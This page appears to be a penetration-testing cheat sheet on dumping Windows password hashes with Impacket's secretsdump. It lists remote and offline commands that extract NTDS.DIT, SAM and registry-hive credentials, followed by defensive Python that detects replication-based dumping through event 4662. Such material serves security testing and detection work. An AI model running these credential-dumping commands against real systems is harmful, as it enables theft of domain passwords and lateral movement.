Dumping Windows Password Hashes
Last modified: 2023-02-08
Using Impacket's SecretsDump, we can dump Windows password hashes, either remotely with valid credentials or offline from a copied NTDS.DIT file or registry hives.
Commands
Using Credentials
impacket-secretsdump example.local/username:password@<target-ip>
# -just-dc: Extract only NTDS.DIT data (NTLM hashes and Kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>
Using NTDS file or Hives
# -ntds: NTDS.DIT file to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -ntds ntds.dit -system system LOCAL
# -sam: SAM hive to parse
# -security: SECURITY hive to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -sam sam.bak -security security.bak -system system.bak LOCAL
After dumping the hashes, we can crack them to reveal the passwords or use them with Pass-The-Hash.
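From the defender's side, the -just-dc modes above leave a trace on the domain controller. The following is an added example, not part of the original page or of Impacket. It assumes those modes pull data over directory replication (DRSUAPI), that Directory Service Access auditing logs this as Security event 4662, and that events have been exported as dictionaries with the field names shown. The account names and events are constructed.

```python
import re

# Control-access-right GUIDs that gate directory replication (AD schema constants).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

def find_replication_requests(events, allowed_subjects=()):
    """Return 4662 events where a non-allowlisted account used a replication right."""
    allowed = {s.lower() for s in allowed_subjects}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        subject = ev.get("SubjectUserName", "")
        # Domain controllers replicate as machine accounts (trailing '$');
        # list them, and any directory-sync service account, in allowed_subjects.
        if subject.lower() in allowed:
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS)
        if rights:
            hits.append({"subject": subject, "time": ev.get("TimeCreated"), "rights": rights})
    return hits

# Constructed sample events (not captured from a real domain controller).
SAMPLE_EVENTS = [
    {"EventID": 4662, "TimeCreated": "2023-02-08T10:00:01Z", "SubjectUserName": "DC01$",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "TimeCreated": "2023-02-08T10:04:37Z", "SubjectUserName": "username",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "TimeCreated": "2023-02-08T10:05:12Z", "SubjectUserName": "helpdesk",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "TimeCreated": "2023-02-08T10:06:00Z", "SubjectUserName": "username"},
]

if __name__ == "__main__":
    for hit in find_replication_requests(SAMPLE_EVENTS, allowed_subjects=["DC01$"]):
        print(hit["time"], hit["subject"], ", ".join(hit["rights"]))
```

The offline forms (-ntds, -sam, -security, -system with LOCAL) parse copied files and do not generate these replication events, so they need separate monitoring of access to NTDS.DIT and the registry hives.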